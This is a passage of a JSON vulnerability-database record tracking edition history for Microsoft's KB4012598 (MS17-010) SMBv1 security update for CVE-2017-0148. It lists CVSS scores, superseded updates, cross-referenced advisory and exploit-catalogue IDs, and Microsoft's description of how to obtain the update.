"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-24T22:05:00", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB3130896", 
"KB2536275", "KB957095", "KB3177186", "KB958687"], "parentseeds": ["KB4489880", "KB4520002", "KB4486465", "KB4487019", "KB5003210", "KB5004955", "KB4516026", "KB4601360", "KB4487023", "KB4493471", "KB4534303", "KB4577064", "KB4541506", "KB4499149", "KB5001389", "KB4571730", "KB4592498", "KB4056759", "KB4489876", "KB4565536", "KB5003661", "KB4018466", "KB4537810", "KB4550951", "KB4507452", "KB4580378", "KB4503273", "KB4586807", "KB4530695", "KB4556860", "KB4598288", "KB4512476", "KB5004305", "KB5000844", "KB4561670", "KB4525234"], "msproducts": ["4393", "9318", "9311", "9344", "9316", "10287", "9312"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-24T22:05:00", "differentElements": ["cvss2", "cvss3", "description", "title"], "edition": 4}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "494b291b96a93232800a3536b407b17b130f4411bc7a28777ce520ddfb663dbf", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-26T09:20:45", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-07-26T09:20:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-26T09:20:45", "rev": 2}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB2536275", "KB957095", "KB923414", "KB917159", "KB3073921", "KB971468", "KB3130896", "KB982214", "KB958687", "KB3177186"], "parentseeds": ["KB5004305", "KB4512476", "KB5000844", "KB4561670", "KB4018466", "KB5001389", "KB4580378", "KB4489880", "KB4541506", "KB4493471", "KB4530695", "KB5004955", "KB4516026", "KB5003210", "KB4537810", "KB4577064", "KB4486465", "KB4556860", "KB4601360", "KB4586807", "KB4487019", "KB4571730", "KB4565536", "KB4503273", "KB4592498", "KB4520002", "KB4598288", "KB4550951", "KB4499149", "KB4525234", "KB4489876", "KB4507452", "KB4534303", "KB5003661", "KB4056759", "KB4487023"], "msproducts": ["9311", "4393", "9316", "9312", "10287", "9344", "9318"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-26T09:20:45", "differentElements": ["cvss2", "cvss3", "kb", "mscve", "msfamily", "msimpact", "msproducts", "msseverity", "parentseeds", "superseeds"], "edition": 5}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "851de0ec06547679dee9df230811ae821d194a533cb57e9be3b75171c11509cc", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", "published": "2017-03-14T07:00:00", "modified": 
"2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-26T09:20:45", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-07-26T09:20:45", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": 
"f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-26T09:20:45", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "", "msrc": "", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": [], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-26T09:20:45", "differentElements": ["cvss2", "cvss3", "description", "kb", "mscve", "msfamily", "msimpact", "msproducts", "msseverity", "parentseeds", "superseeds", "title"], "edition": 6}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "7ff4093964dbcdab69ceb4c12ddd23c6", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. 
For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-12T22:04:32", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-08-12T22:04:32", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-12T22:04:32", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB958687", "KB982214", "KB971468", "KB3073921", "KB957095", "KB3130896", "KB917159", "KB3177186", "KB923414", "KB2508429", "KB2536275"], "parentseeds": ["KB4541506", "KB4534303", "KB4512476", "KB5005090", "KB4565536", "KB5003210", "KB4507452", "KB4561670", "KB4586807", "KB4550951", "KB5004955", "KB4592498", "KB4056759", "KB4493471", "KB5000844", "KB4018466", "KB4598288", "KB4487019", "KB4577064", "KB4571730", "KB4486465", "KB4489880", "KB5001389", "KB4580378", "KB4537810", "KB5004305", "KB4516026", "KB4489876", "KB4503273", "KB4601360", "KB4556860", "KB4530695", "KB4499149", "KB4525234", "KB4487023", "KB5003661", "KB4520002"], "msproducts": ["10287", "4393", "9344", "9312", "9318", "9311", "9316"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-08-12T22:04:32", "differentElements": ["description", "title"], "edition": 7}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": 
"35679c4e8f14a51dfb43a335d275931d", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-26T10:51:42", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-08-26T10:51:42", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-08-26T10:51:42", "rev": 2}}, "objectVersion": "1.6", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2536275", "KB3177186", "KB957095", "KB917159", "KB958687", "KB3130896", "KB2508429", "KB971468", "KB3073921", "KB923414", "KB982214"], "parentseeds": 
["KB5000844", "KB4056759", "KB4550951", "KB5005090", "KB4598288", "KB4561670", "KB4586807", "KB4601360", "KB4018466", "KB4493471", "KB4489876", "KB4592498", "KB4556860", "KB4499149", "KB4486465", "KB5004955", "KB4520002", "KB5001389", "KB4577064", "KB5003210", "KB4565536", "KB4487023", "KB4534303", "KB4489880", "KB5003661", "KB4507452", "KB4512476", "KB4525234", "KB4537810", "KB5004305", "KB4580378", "KB4571730", "KB4541506", "KB4503273", "KB4530695", "KB4487019", "KB4516026"], "msproducts": ["9312", "4393", "9344", "9318", "9311", "9316", "10287"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-08-26T10:51:42", "differentElements": ["description", "title"], "edition": 8}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "7ff4093964dbcdab69ceb4c12ddd23c6", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "None\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. 
For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n##\n\n __\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-07T16:58:39", "history": [], "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", 